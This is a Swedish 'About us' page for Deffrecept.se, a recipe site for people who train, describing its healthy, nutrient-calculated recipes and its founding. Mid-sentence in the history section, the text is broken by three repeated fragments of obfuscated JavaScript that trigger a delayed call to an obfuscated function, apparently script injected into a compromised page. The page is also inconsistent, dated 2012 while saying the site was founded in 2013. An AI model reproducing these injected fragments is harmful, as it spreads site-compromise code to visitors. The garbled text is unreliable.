Om oss

Comments Off | March 6, 2012

Deffrecept.se är receptportalen för dig som tränar. Vi arbetar bara med proteinrika, nyttiga och goda rätter. Samtliga recept har beräknat näringsinnehåll och är  både kalorisnåla och nyttiga.

Majoriteten av våra receptskribenter har bred bakgrund inom elitidrott och träning. Våra recept noga utvalda och varierade för att hålla hög kvalité på smak och ett bra näringsinnehåll. Vårt mål är att du som tränar oavsett tillfälle ska kunna hitta något för dig. Spendera mindre tid på att leta och skapa mer tid i din hälsosamma vardag.

Historia

Varför ska det vara så svårt att hitta riktigt bra träningsrecept?

Vi har länge letat efter den perfekt kokboken för dig som bryr dig lite extra om din kosthållning. Vi har på olika ställen hittat en hel del kunskap och recept men de har varit utspridda på flera olika platser på nätet. Nu har vi äntligen samlat och tagit fram vår egna databas för att underlätta för dig.

Vår ambition är att samla kunskapen i en och samma portal. Så kom Deffrecept.se till världen.  Alla våra rätter har krav på hälsosam och nyttig kost. Vi har valt att byta ut onyttiga råvaror mot hälsosammare och nyttigare alternativ med ambitionen att fortfarandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e bibehålla smaken. Samtliga recept är näringsberäknade för att förenkla kontrollen över ditt dagliga intag. Allt för att förenkla din kosthållning och göra det enklare följa dina mål.

Deffrecept.se grundades 2013.

Bidra med recept

Vi söker alltid nya bidrag till härliga kulinariska upplevelser. Kontakta oss här.

Comments are closed.